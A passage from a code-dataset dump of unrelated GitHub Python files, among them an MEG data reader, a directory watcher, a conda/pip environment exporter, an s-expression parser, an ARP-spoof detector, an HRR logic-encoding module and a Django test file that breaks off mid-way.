fiducials found, likely to cause problems later!')\n t = np.eye(4)\n \n with self.info._unlock():\n self.info['dev_head_t'] = \\\n Transform(FIFF.FIFFV_COORD_DEVICE,\n FIFF.FIFFV_COORD_HEAD, t)\n \n def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):\n \"\"\"Read a chunk of raw data.\"\"\"\n si = self._raw_extras[fi]\n _read_segments_file(\n self, data, idx, fi, start, stop, cals, mult, dtype=si['dt'])\n \n\ndef _convert_channel_info(chans):\n nmeg = nstim = nmisc = nref = 0\n \n units, sf = _determine_position_units(chans['pos'])\n \n chs = list()\n for ii in range(0,len(chans['name'])):\n ch = dict(scanno=ii + 1, range=1., 
cal=1., loc=np.full(12, np.nan),\n unit_mul=FIFF.FIFF_UNITM_NONE, ch_name=chans['name'][ii],\n coil_type=FIFF.FIFFV_COIL_NONE) \n \n chs.append(ch)\n \n # create the channel information\n if chans['pos'][ii] is not None:\n r0 = chans['pos'][ii].copy()/sf # mm to m\n ez = chans['ori'][ii].copy()\n ez = ez/np.linalg.norm(ez)\n ex, ey = _get_plane_vectors(ez)\n ch['loc'] = np.concatenate([r0, ex, ey, ez])\n \n if chans['type'][ii] == 'MEGMAG':\n nmeg += 1\n ch.update(logno=nmeg, coord_frame=FIFF.FIFFV_COORD_DEVICE,\n kind=FIFF.FIFFV_MEG_CH, unit=FIFF.FIFF_UNIT_T,\n coil_type=FIFF.FIFFV_COIL_QUSPIN_ZFOPM_MAG2)\n elif chans['type'][ii] == 'MEGREFMAG':\n nref += 1\n ch.update(logno=nref, coord_frame=FIFF.FIFFV_COORD_UNKNOWN,\n kind=FIFF.FIFFV_REF_MEG_CH, unit=FIFF.FIFF_UNIT_T,\n coil_type=FIFF.FIFFV_COIL_QUSPIN_ZFOPM_MAG2)\n elif chans['type'][ii] == 'TRIG':\n nstim += 1\n ch.update(logno=nstim, coord_frame=FIFF.FIFFV_COORD_UNKNOWN,\n kind=FIFF.FIFFV_STIM_CH, unit=FIFF.FIFF_UNIT_V)\n else:\n nmisc += 1\n ch.update(logno=nmisc, coord_frame=FIFF.FIFFV_COORD_UNKNOWN,\n kind=FIFF.FIFFV_MISC_CH, unit=FIFF.FIFF_UNIT_NONE)\n \n \n # set the calibration based on the units - MNE expects T units for meg\n # and V for eeg\n if chans['units'][ii] == 'fT':\n ch.update(cal=1e-15)\n elif chans['units'][ii] == 'pT':\n ch.update(cal=1e-12)\n elif chans['units'][ii] == 'nT':\n ch.update(cal=1e-9)\n elif chans['units'][ii] == 'mV':\n ch.update(cal=1e3)\n elif chans['units'][ii] == 'uV':\n ch.update(cal=1e6)\n\n return chs\n\ndef _compose_meas_info(meg,chans):\n \"\"\"Create info structure\"\"\"\n info = _empty_info(meg['SamplingFrequency'])\n \n # Collect all the necessary data from the structures read\n info['meas_id'] = get_new_file_id()\n tmp = _convert_channel_info(chans)\n info['chs'] = _refine_sensor_orientation(tmp)\n # info['chs'] = _convert_channel_info(chans)\n info['line_freq'] = meg['PowerLineFrequency']\n info['bads'] = _read_bad_channels(chans)\n info._unlocked = False\n info._update_redundant()\n return info\n\ndef _determine_nsamples(bin_fname,nchans,precision):\n bsize = op.getsize(bin_fname)\n if precision == 'single':\n bps = 4\n else:\n bps = 8\n nsamples = int(bsize/(nchans*bps))\n return nsamples\n\ndef _read_bad_channels(chans):\n bads = list()\n for ii in range(0,len(chans['status'])):\n if chans['status'][ii] == 'bad':\n bads.append(chans['name'][ii])\n return bads\n \ndef _from_tsv(fname, dtypes=None):\n \"\"\"Read a tsv file into an OrderedDict.\n Parameters\n ----------\n fname : str\n Path to the file being loaded.\n dtypes : list, optional\n List of types to cast the values loaded as. This is specified column by\n column.\n Defaults to None. In this case all the data is loaded as strings.\n Returns\n -------\n data_dict : collections.OrderedDict\n Keys are the column names, and values are the column data.\n \"\"\"\n data = np.loadtxt(fname, dtype=str, delimiter='\\t', ndmin=2,\n comments=None, encoding='utf-8-sig')\n column_names = data[0, :]\n info = data[1:, :]\n data_dict = OrderedDict()\n if dtypes is None:\n dtypes = [str] * info.shape[1]\n if not isinstance(dtypes, (list, tuple)):\n dtypes = [dtypes] * info.shape[1]\n if not len(dtypes) == info.shape[1]:\n raise ValueError('dtypes length mismatch. 
Provided: {0}, '\n 'Expected: {1}'.format(len(dtypes), info.shape[1]))\n for i, name in enumerate(column_names):\n data_dict[name] = info[:, i].astype(dtypes[i]).tolist()\n return data_dict\n\ndef _get_file_names(binfile):\n \n files = dict();\n files['dir'] = op.dirname(binfile)\n\n tmp = op.basename(binfile)\n tmp = str.split(tmp,'_meg.bin')\n\n files['root'] = tmp[0];\n files['bin'] = op.join(files['dir'],files['root'] + '_meg.bin')\n files['meg'] = op.join(files['dir'],files['root'] + '_meg.json')\n files['chans'] = op.join(files['dir'],files['root'] + '_channels.tsv')\n files['positions'] = op.join(files['dir'],files['root'] + '_positions.tsv')\n files['coordsystem'] = op.join(files['dir'],files['root'] + '_coordsystem.json')\n \n return files","repo_name":"FIL-OPMEG/OPyM","sub_path":"opym/io/ucl.py","file_name":"ucl.py","file_ext":"py","file_size_in_byte":9199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6271187403","text":"import os\nimport argparse\nimport time\nimport datetime\nimport logging\nimport signal\nimport sys\n__author__ = \"Joey with help from demo videos and coaches\"\n\nif sys.version_info[0] < 3:\n raise RuntimeError(\"This program requires Python 3\")\n\n\"\"\"Global Variables\"\"\"\nlogger = logging.getLogger(__file__)\nexit_flag = False\nwatch_files = {}\nlast_position = 0\n\n\ndef watch_directory(args):\n \"\"\"Watches directory for magic text\"\"\"\n directory = args.path\n # logger.info('Watch Dir: {}, File Ext: {}, Polling Int: {}, Magic Txt: {}'\n # .format(directory, args.ext, args.interval, args.magic))\n\n file_list = [os.path.join(directory, f)\n for f in os.listdir(directory)]\n for file in file_list:\n if file not in watch_files and file.endswith(args.ext):\n watch_files[file] = 0\n logger.info('Watching new file: {}'.format(file))\n for file in list(watch_files):\n if file not in file_list:\n logger.info('Removed deleted file: {}'.format(file))\n del watch_files[file]\n for file in watch_files:\n last_line_num = find_magic(\n file, watch_files[file], args.magic)\n watch_files[file] = last_line_num\n time.sleep(args.interval)\n\n\ndef find_magic(filename, skip_to_line, magic_word):\n \"\"\"\n Read a file and look for the magic text,\n logging a message when it is found.\n \"\"\"\n i = 0\n with open(filename) as f:\n for i, line in enumerate(f, start=1):\n if i < skip_to_line:\n continue\n if magic_word in line:\n logger.info(f'Found the {magic_word} on line {i} in {filename}')\n return i + 1\n return i + 1\n\n\ndef create_parser():\n \"\"\"Creates and returns an argparse cmd line\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--ext', type=str, default='.txt',\n help='Text file extension to watch')\n parser.add_argument('-i', '--interval', type=float, default=1.0,\n help='How often to watch the text file')\n parser.add_argument('path', help='Directory to watch')\n parser.add_argument('magic', help='String to watch for')\n return parser\n\n\ndef signal_handler(sig_num, frame):\n \"\"\"\n This is a handler for SIGTERM and SIGINT.\n Other signals can be mapped here as well (SIGHUP?)\n Basically it just sets a global flag,\n and main() will exit its loop if the signal is trapped.\n :param sig_num: The integer signal number that was trapped from the OS.\n :param frame: Not used\n :return None\n \"\"\"\n global exit_flag\n logger.warning('Received ' + signal.Signals(sig_num).name)\n if sig_num in (signal.SIGINT, signal.SIGTERM):\n exit_flag = True\n\n\ndef main():\n logging.basicConfig(\n 
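# NOTE (editor's addition): this configures the root handler's output format;\n # the module logger's own level is raised to DEBUG a few lines below.\n 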
format='%(asctime)s.%(msecs)03d %(name)-12s %(levelname)-8s'\n '[%(threadName)-12s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n logger.setLevel(logging.DEBUG)\n app_start_time = datetime.datetime.now()\n logger.info(\n '\\n'\n '----------------------------------------------------\\n'\n ' Running {0}\\n'\n ' Started on {1}\\n'\n '----------------------------------------------------\\n'\n .format(__file__, app_start_time.isoformat())\n )\n parser = create_parser()\n args = parser.parse_args()\n uptime = datetime.datetime.now() - app_start_time\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n logger.info('Watch Dir: {}, File Ext: {}, Polling Int: {}, Magic Txt: {}'\n .format(args.path, args.ext, args.interval, args.magic))\n\n while not exit_flag:\n try:\n watch_directory(args)\n except OSError as e:\n logger.error(e)\n except Exception as e:\n logger.exception('Unhandled exception: {}'.format(e))\n time.sleep(args.interval)\n\n logger.info(\n '\\n'\n '----------------------------------------------------\\n'\n ' Stopped {0}\\n'\n ' Uptime was {1}\\n'\n '----------------------------------------------------\\n'\n .format(__file__, str(uptime))\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Oejay94/dirwatcher","sub_path":"dirwatcher.py","file_name":"dirwatcher.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"736864725","text":"import re\nimport os\n# Set Functions and parameters\n## Extract elements into a list, and parse observations to elements\ndef extractLines(lst):\n return [el.split() for el in lst]\n\n## Perform multiple 1:1 string replacements using dict\ndef multipleReplace(dict, text):\n # Create a regular expression from the dictionary keys\n regex = re.compile(\"(%s)\" % \"|\".join(map(re.escape, dict.keys())))\n\n # For each match, look-up corresponding value in dictionary\n return regex.sub(lambda mo: dict[mo.string[mo.start():mo.end()]], text)\n\ndef makeDirFile(file):\n if not file.endswith('.csv'):\n outname = file + '.csv'\n else:\n outname = file\n\n parent = os.path.dirname(os.path.dirname(os.path.abspath('__file__')))\n outdir = parent + '/Data'\n\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n print('Created new directory:',outdir)\n\n return os.path.join(outdir, outname)\n\ndef makeOutFile(file):\n if not file.endswith('.png'):\n outname = file + '.png'\n else:\n outname = file\n\n parent = os.path.dirname(os.path.dirname(os.path.abspath('__file__')))\n outdir = parent + '/Outputs'\n\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n print('Created new directory:',outdir)\n\n return os.path.join(outdir,outname)\n","repo_name":"Caruychen/Climate_change_report","sub_path":"Wrangler.py","file_name":"Wrangler.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31154362525","text":"# Create the GUI\nroot = tk.Tk()\nroot.title(\"Report Generator\")\n\n# Report selector\nreport_label = tk.Label(root, text=\"Select Report:\")\nreport_label.pack()\nreport_selector = ttk.Combobox(root, values=[\n \"Clocked In Report\",\n \"Labor Report\",\n \"Sales Report\",\n \"Discounts Report\",\n \"Sales by Employee\",\n \"Tax Report\"\n])\nreport_selector.pack()\n\n# Date range selector\ndate_range_label = tk.Label(root, text=\"Select Date Range:\")\ndate_range_label.pack()\ndate_range_frame = 
ttk.Frame(root)\ndate_range_frame.pack()\n\nstart_date_label = ttk.Label(date_range_frame, text=\"Start Date:\")\nstart_date_label.grid(row=0, column=0)\nstart_date_entry = DateEntry(date_range_frame, date_pattern='dd-mm-yyyy')\nstart_date_entry.grid(row=0, column=1)\n\nend_date_label = ttk.Label(date_range_frame, text=\"End Date:\")\nend_date_label.grid(row=0, column=2)\nend_date_entry = DateEntry(date_range_frame, date_pattern='dd-mm-yyyy')\nend_date_entry.grid(row=0, column=3)\n\n# Generate button\ngenerate_button = ttk.Button(root, text=\"Generate Report\", command=on_button_click)\ngenerate_button.pack()\n\n# Report text box\nreport_text = tk.Text(root, width=60, height=10, state='disabled')\nreport_text.pack()\n\nroot.mainloop()","repo_name":"SymbioticLove/Restaurant-POS-System","sub_path":"src/python_modules/GUI_creation.py","file_name":"GUI_creation.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71738068306","text":"qtd = 5 #let's test the program with just a few numbers, to speed up execution. \n\nprint(f'Digite {qtd} números inteiros:')\n\nfor i in range(qtd):\n\n num = int(input())\n\n if i == 0: #checks whether this is the 1st iteration of the for loop\n maior = num\n else:\n if num > maior:\n maior = num\n\nprint(f'Maior = {maior}')","repo_name":"AllanSmithll/APE-2022.1","sub_path":"Estrutura de Repetição/For/Normal/questao-04.py","file_name":"questao-04.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"513395731","text":"import io\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Optional, TypeVar, Union\n\nfrom ruamel.yaml import YAML # type: ignore\nfrom .conda_env import CondaEnvSpec\nfrom .version import RelaxLevel, version_string\n\n\n@dataclass\nclass CondaPackage:\n name: str\n version: Optional[str]\n channel: Optional[str]\n\n def export(\n self, *, include_channel: bool = False, relax: RelaxLevel = RelaxLevel.FULL\n ) -> str:\n return \"\".join(\n [\n f\"{self.channel}::\"\n if (include_channel and self.channel is not None)\n else \"\",\n self.name,\n version_string(self.version, op=\"=\", how=relax),\n ]\n )\n\n\n@dataclass\nclass PipPackage:\n name: str\n version: str\n\n def export(self, *, relax: RelaxLevel = RelaxLevel.FULL) -> str:\n return f\"{self.name}{version_string(self.version, op='==', how=relax)}\"\n\n\n@dataclass\nclass YAMLExport:\n env_spec: CondaEnvSpec\n conda_packages: List[CondaPackage] = field(default_factory=list)\n pip_packages: List[PipPackage] = field(default_factory=list)\n\n def __post_init__(self):\n self.yaml = YAML()\n self.yaml.default_flow_style = False\n self.yaml.indent(sequence=4, mapping=2, offset=2)\n\n async def export(\n self,\n *,\n include_channel: bool = False,\n relax: RelaxLevel = RelaxLevel.FULL,\n export_name: Optional[str] = None,\n ) -> str:\n yml_data = await self.get_yml_data(\n include_channel=include_channel, relax=relax, export_name=export_name\n )\n stream = io.StringIO()\n self.yaml.dump(yml_data, stream)\n return stream.getvalue()\n\n async def get_yml_data(\n self,\n *,\n include_channel: bool,\n relax: RelaxLevel = RelaxLevel.FULL,\n export_name: Optional[str] = None,\n ) -> Dict:\n deps: List[Union[str, Dict[str, List[str]]]] = [\n p.export(include_channel=include_channel, relax=relax)\n for p in sort_packages(self.conda_packages)\n ]\n if len(self.pip_packages):\n pip_deps = {\n \"pip\": 
[p.export(relax=relax) for p in sort_packages(self.pip_packages)]\n }\n deps.append(pip_deps)\n return {\n \"name\": export_name\n if export_name is not None\n else self.env_spec.export_name(),\n \"dependencies\": deps,\n }\n\n\nP = TypeVar(\"P\", bound=Union[PipPackage, CondaPackage])\n\nSortPriority = {\"python\": 0, \"pip\": 1}\n\n\ndef sort_packages(packages: List[P]) -> List[P]:\n return sorted(packages, key=lambda p: (SortPriority.get(p.name, 1e6), p.name))\n","repo_name":"indigoviolet/conda-pip-minimal","sub_path":"src/conda_pip_minimal/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22545375298","text":"import os\r\nimport datetime\r\n# ARP SPOOFER DETECTOR\r\n\r\ndef arp_table_extract():\r\n arp_table = os.popen('arp -a').read()\r\n arp_table_lines = arp_table.splitlines()\r\n ip_mac_addr = {}\r\n\r\n for line in arp_table_lines:\r\n if \"ff-ff-ff-ff-ff-ff\" in line:\r\n break\r\n if arp_table_lines.index(line) > 2:\r\n ip, mac, _type = line.split()\r\n ip_mac_addr[ip] = mac\r\n\r\n duplicate_mac_address(ip_mac_addr)\r\n\r\n\r\ndef duplicate_mac_address(ip_mac_addr):\r\n mac_addr = []\r\n for mac in ip_mac_addr.values():\r\n if mac in mac_addr:\r\n print(\"ARP SPOOF DETECTED!!\")\r\n create_log_file(mac)\r\n break\r\n mac_addr.append(mac)\r\n\r\n\r\ndef create_log_file(mac):\r\n date = datetime.datetime.now()\r\n with open(\"spoof_log.txt\", \"a\") as log_file:\r\n log_file.write(\"ARP SPOOF!!\\n THE MAC ADDRESS IS {}/\"\r\n \"DETECTED ON {} \".format(mac, date))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n arp_table_extract()\r\n","repo_name":"IlayHam/EveryDayIsANewPythonScript","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38999879338","text":"#!/usr/bin/env python\n# -*- Mode: Python; indent-tabs-mode: nil -*-\n# vi: set ts=4 sw=4 expandtab:\n\n# borrowed from http://gist.github.com/240957\n# no license information found\n\n# Support for comments ; added by Adobe.\n\nfrom string import whitespace\n\natom_end = set('()\"\\'') | set(whitespace)\ndef parse(sexp):\n stack, i, length = [[]], 0, len(sexp)\n while i < length:\n c = sexp[i]\n\n #print c, stack\n if c == ';':\n while i + 1 < length and sexp[i + 1] != '\\n':\n i += 1\n else:\n reading = type(stack[-1])\n if reading == list:\n if c == '(': stack.append([])\n elif c == ')':\n stack[-2].append(stack.pop())\n if stack[-1][0] == ('quote',): stack[-2].append(stack.pop())\n elif c == '\"': stack.append('')\n elif c == \"'\": stack.append([('quote',)])\n elif c in whitespace: pass\n else: stack.append((c,))\n elif reading == str:\n if c == '\"':\n stack[-2].append(stack.pop())\n if stack[-1][0] == ('quote',): stack[-2].append(stack.pop())\n elif c == '\\\\':\n i += 1\n stack[-1] += sexp[i]\n else: stack[-1] += c\n elif reading == tuple:\n if c in atom_end:\n atom = stack.pop()\n if atom[0][0].isdigit(): stack[-1].append(eval(atom[0]))\n else: stack[-1].append(atom[0])\n if stack[-1][0] == ('quote',): stack[-2].append(stack.pop())\n continue\n else: stack[-1] = ((stack[-1][0] + c),)\n i += 1\n return 
stack.pop()\n","repo_name":"adobe-flash/crossbridge","sub_path":"avmplus/halfmoon/templates/sexp.py","file_name":"sexp.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"48"} +{"seq_id":"70301280786","text":"import collections\nimport functools\nimport zlib\n\nimport numpy\nimport scipy.stats\n\nfrom AST import Var, Dist, Const, Func, Eq, Disj, Conj, fold_term\nfrom CircularHRR import CircularHRR\n\nCNFtoHRR1Settings = collections.namedtuple(\n 'CNFtoHRR1Settings',\n '''\n var_base_weight\n dist_base_weight\n const_base_weight\n skolem_base_weight\n func_base_weight\n func_arity_weight\n arg_base_weight\n arg_arity_weight\n arg_index_weight\n superposition_func_funcobj_weight\n superposition_func_argobjs_weight\n superposition_func_copy_weight\n superposition_func_beta1\n superposition_func_beta2\n superposition_func_equalize_size_weight\n superposition_eq_pos_weight\n superposition_eq_assoc_weight\n superposition_eq_equalize_size_weight\n superposition_disj_assoc_weight\n superposition_disj_equalize_size_weight\n superposition_conj_assoc_weight\n superposition_conj_equalize_size_weight\n '''\n )\n\ndefaultCNFtoHRR1Settings = CNFtoHRR1Settings(\n var_base_weight = 0.5,\n dist_base_weight = 0.5,\n const_base_weight = 0.5,\n skolem_base_weight = 0.5,\n func_base_weight = 0.5,\n func_arity_weight = 0.25,\n arg_base_weight = 0.5,\n arg_arity_weight = 0.25,\n arg_index_weight = 0.125,\n superposition_func_funcobj_weight = 0.2,\n superposition_func_argobjs_weight = 0.4,\n superposition_func_copy_weight = 0.4,\n superposition_func_beta1 = 1,\n superposition_func_beta2 = 1,\n superposition_func_equalize_size_weight = 0.5,\n superposition_eq_pos_weight = 0.5,\n superposition_eq_assoc_weight = 0.5,\n superposition_eq_equalize_size_weight = 1,\n superposition_disj_assoc_weight = 0.5,\n superposition_disj_equalize_size_weight = 1,\n superposition_conj_assoc_weight = 0.5,\n superposition_conj_equalize_size_weight = 1,\n )\n\ndef randomCNFtoHRR1Settings_v1(seed):\n rs = numpy.random.RandomState(seed)\n\n var_base_weight = rs.uniform()\n dist_base_weight = rs.uniform()\n const_base_weight = rs.uniform()\n skolem_base_weight = rs.uniform()\n func_base_weight = rs.uniform()\n func_arity_weight = rs.uniform(high=1 - func_base_weight)\n arg_base_weight = rs.uniform()\n arg_arity_weight = rs.uniform(high=1 - arg_base_weight)\n arg_index_weight = rs.uniform(high=1 - arg_base_weight - arg_arity_weight)\n\n superposition_func_weights = rs.uniform(size=3)\n superposition_func_weights /= sum(superposition_func_weights)\n (superposition_func_funcobj_weight,\n superposition_func_argobjs_weight,\n superposition_func_copy_weight) = superposition_func_weights\n\n superposition_func_beta1 = rs.exponential()\n superposition_func_beta2 = rs.exponential()\n superposition_func_equalize_size_weight = rs.uniform()\n\n superposition_eq_weights = rs.uniform(size=2)\n superposition_eq_weights /= sum(superposition_eq_weights)\n superposition_eq_pos_weight = rs.uniform()\n superposition_eq_assoc_weight = rs.uniform()\n superposition_eq_equalize_size_weight = rs.uniform()\n superposition_disj_assoc_weight = rs.uniform()\n superposition_disj_equalize_size_weight = rs.uniform()\n superposition_conj_assoc_weight = rs.uniform()\n superposition_conj_equalize_size_weight = rs.uniform()\n\n return CNFtoHRR1Settings(\n var_base_weight,\n dist_base_weight,\n const_base_weight,\n skolem_base_weight,\n func_base_weight,\n func_arity_weight,\n 
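# NOTE (editor's addition): this positional order must match the field order\n # of the CNFtoHRR1Settings namedtuple defined at the top of this module.\n 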
arg_base_weight,\n arg_arity_weight,\n arg_index_weight,\n superposition_func_funcobj_weight,\n superposition_func_argobjs_weight,\n superposition_func_copy_weight,\n superposition_func_beta1,\n superposition_func_beta2,\n superposition_func_equalize_size_weight,\n superposition_eq_pos_weight,\n superposition_eq_assoc_weight,\n superposition_eq_equalize_size_weight,\n superposition_disj_assoc_weight,\n superposition_disj_equalize_size_weight,\n superposition_conj_assoc_weight,\n superposition_conj_equalize_size_weight,\n )\n\nclass CNFtoHRR1:\n def __init__(self, hrr_size, settings):\n self.hrr_size = hrr_size\n self.settings = settings\n\n # prefix with ! so that these vectors never occur in normal cnf input\n self.var_base = self.get_ground_vector('!Var_base')\n self.dist_base = self.get_ground_vector('!Dist_base')\n self.const_base = self.get_ground_vector('!Const_base')\n self.skolem_base = self.get_ground_vector('!Skolem_base')\n self.func_base = self.get_ground_vector('!Func_base')\n self.arg_base = self.get_ground_vector('!Arg_base')\n\n self.eq_assoc = self.get_ground_vector('!Eq_assoc')\n self.disj_assoc = self.get_ground_vector('!Disj_assoc')\n self.conj_assoc = self.get_ground_vector('!Conj_assoc')\n\n def var_id(self, name):\n return self.get_ground_vector('!Var_id_{}'.format(name))\n def dist_id(self, name):\n return self.get_ground_vector('!Dist_id_{}'.format(name))\n def const_id(self, name):\n return self.get_ground_vector('!Const_id_{}'.format(name))\n def skolem_id(self, name):\n return self.get_ground_vector('!Skolem_id_{}'.format(name))\n def func_arity(self, arity):\n return self.get_ground_vector('!Func_arity_{}'.format(arity))\n def func_id(self, name):\n return self.get_ground_vector('!Func_id_{}'.format(name))\n def arg_arity(self, arity):\n return self.get_ground_vector('!Arg_arity_{}'.format(arity))\n def arg_index(self, arity, index):\n return self.get_ground_vector('!Arg_index_{}_{}'.format(arity, index))\n def arg_id(self, name):\n return self.get_ground_vector('!Arg_id_{}'.format(name))\n\n @functools.lru_cache()\n def get_ground_vector(self, label):\n \"\"\" Deterministically generate a random vector from its label \"\"\"\n\n seed = zlib.adler32(\n (str(self.hrr_size)+label).encode('utf-8')\n ) & 0xffffffff\n\n return CircularHRR(self.hrr_size, seed)\n\n\n def fold_term(self, term):\n return fold_term(\n term,\n self.fvar,\n self.fdist,\n self.fconst,\n self.fskolem,\n self.ffunc,\n self.feq,\n self.fdisj,\n self.fconj)\n\n def fvar(self, name):\n ''' Creates HRR for variable node.\n\n Relevant settings:\n var_base_weight\n '''\n return (self.settings.var_base_weight * self.var_base +\n (1 - self.settings.var_base_weight) * self.var_id(name)\n ).normalize()\n\n def fdist(self, name):\n ''' Creates HRR for distinct constant node.\n\n Relevant settings:\n dist_base_weight\n '''\n return (self.settings.dist_base_weight * self.dist_base +\n (1 - self.settings.dist_base_weight) * self.dist_id(name)\n ).normalize()\n\n def fconst(self, name):\n ''' Creates HRR for constant node.\n\n Relevant settings:\n const_base_weight\n '''\n return (self.settings.const_base_weight * self.const_base +\n (1 - self.settings.const_base_weight) * self.const_id(name)\n ).normalize()\n\n def fskolem(self, name):\n ''' Creates HRR for skolem constant node.\n\n Relevant settings:\n skolem_base_weight\n '''\n return (self.settings.skolem_base_weight * self.skolem_base +\n (1 - self.settings.skolem_base_weight) * self.skolem_id(name)\n ).normalize()\n\n def ffunc(self, name, argsizes, 
arghrrs):\n ''' Creates HRR for functor node.\n\n Relevant settings:\n func_base_weight\n func_arity_weight\n arg_base_weight\n arg_arity_weight\n arg_index_weight\n superposition_func_funcobj_weight\n superposition_func_argobjs_weight\n superposition_func_copy_weight\n superposition_func_beta1\n superposition_func_beta2\n superposition_func_equalize_size_weight # 1 means all branches are weighted by size, 0 means branches are equally weighted\n '''\n arity = len(argsizes)\n funcobj = self.settings.superposition_func_funcobj_weight * (\n self.settings.func_base_weight * self.func_base +\n self.settings.func_arity_weight * self.func_arity(arity) +\n (1 - self.settings.func_base_weight - self.settings.func_arity_weight) * self.func_id(name)\n ).normalize()\n\n bias = scipy.stats.betabinom(arity - 1, self.settings.superposition_func_beta1, self.settings.superposition_func_beta2).pmf\n\n totalsize = sum(argsizes)\n\n argobjs = self.settings.superposition_func_argobjs_weight * sum(\n (self.settings.superposition_func_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_func_equalize_size_weight) * 1 / arity) *\n bias(i) *\n (self.settings.arg_base_weight * self.arg_base +\n self.settings.arg_arity_weight * self.arg_arity(arity) +\n self.settings.arg_index_weight * self.arg_index(arity, i) +\n (1 - self.settings.arg_base_weight - self.settings.arg_arity_weight - self.settings.arg_index_weight) * self.arg_id(name)\n ) @\n vec\n for i, (size, vec) in enumerate(zip(argsizes, arghrrs)) )\n\n copyobjs = self.settings.superposition_func_copy_weight * sum(\n (self.settings.superposition_func_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_func_equalize_size_weight) * 1 / arity) *\n bias(i) *\n vec\n for i, (size, vec) in enumerate(zip(argsizes, arghrrs)) )\n\n return (funcobj + argobjs + copyobjs).normalize()\n\n def feq(self, pos, leftsize, rightsize, lefthrr, righthrr):\n ''' Creates HRR for equality node.\n\n Relevant settings:\n superposition_eq_pos_weight\n superposition_eq_assoc_weight\n superposition_eq_equalize_size_weight\n '''\n magnitude = self.settings.superposition_eq_pos_weight\n if not pos:\n magnitude = 1 - magnitude\n\n totalsize = leftsize + rightsize\n\n assoc = self.settings.superposition_eq_assoc_weight * self.eq_assoc @ (lefthrr * righthrr)\n\n copy = (1 - self.settings.superposition_eq_assoc_weight) * sum(\n (self.settings.superposition_eq_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_eq_equalize_size_weight) * 1 / 2) *\n vec\n for size, vec in ((leftsize, lefthrr), (rightsize, righthrr)))\n\n return magnitude * (assoc + copy).normalize()\n\n def fdisj(self, eqsizes, eqhrrs):\n ''' Creates HRR for disj node.\n\n Relevant settings:\n superposition_disj_assoc_weight\n superposition_disj_equalize_size_weight\n '''\n arity = len(eqsizes)\n totalsize = sum(eqsizes)\n\n copy = sum(\n (self.settings.superposition_disj_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_disj_equalize_size_weight) * 1 / arity) *\n vec\n for size, vec in zip(eqsizes, eqhrrs))\n assoc = self.disj_assoc @ (copy * copy)\n\n assoc *= self.settings.superposition_disj_assoc_weight\n copy *= 1 - self.settings.superposition_disj_assoc_weight\n\n return (assoc + copy).normalize()\n\n def fconj(self, disjsizes, disjhrrs):\n ''' Creates HRR for variable node.\n\n Relevant settings:\n superposition_conj_assoc_weight\n superposition_conj_equalize_size_weight\n '''\n arity = len(disjsizes)\n totalsize = 
sum(disjsizes)\n\n copy = sum(\n (self.settings.superposition_conj_equalize_size_weight * size / totalsize +\n (1 - self.settings.superposition_conj_equalize_size_weight) * 1 / arity) *\n vec\n for size, vec in zip(disjsizes, disjhrrs))\n assoc = self.conj_assoc @ (copy * copy)\n\n assoc *= self.settings.superposition_conj_assoc_weight\n copy *= 1 - self.settings.superposition_conj_assoc_weight\n\n return (assoc + copy).normalize()\n\n","repo_name":"thomastanck/Elemmaclassify","sub_path":"HRRv2.py","file_name":"HRRv2.py","file_ext":"py","file_size_in_byte":13392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17484605669","text":"from unittest.mock import patch\n\nfrom cjwstate import commands, rabbitmq\nfrom cjwstate.models.commands import AddStep, DeleteStep\nfrom cjwstate.models.workflow import Workflow\nfrom cjwstate.tests.utils import (\n DbTestCaseWithModuleRegistryAndMockKernel,\n create_module_zipfile,\n)\n\n\nasync def async_noop(*args, **kwargs):\n pass\n\n\n@patch.object(rabbitmq, \"queue_render\", async_noop)\n@patch.object(rabbitmq, \"send_update_to_workflow_clients\", async_noop)\nclass AddDeleteStepTests(DbTestCaseWithModuleRegistryAndMockKernel):\n def assertStepVersions(self, expected_versions):\n positions = list(self.tab.live_steps.values_list(\"order\", flat=True))\n self.assertEqual(positions, list(range(0, len(expected_versions))))\n\n versions = list(\n self.tab.live_steps.values_list(\"last_relevant_delta_id\", flat=True)\n )\n self.assertEqual(versions, expected_versions)\n\n def setUp(self):\n super().setUp()\n\n self.workflow = Workflow.objects.create()\n self.tab = self.workflow.tabs.create(position=0)\n self.module_zipfile = create_module_zipfile(\n \"loadsomething\",\n spec_kwargs={\"parameters\": [{\"id_name\": \"url\", \"type\": \"string\"}]},\n )\n self.kernel.migrate_params.side_effect = RuntimeError(\n \"AddStep and tests should cache migrated params correctly\"\n )\n\n # Add another module, then undo, redo\n def test_add_module(self):\n all_modules = self.tab.live_steps\n\n v1 = 1\n existing_module = self.tab.steps.create(\n order=0,\n 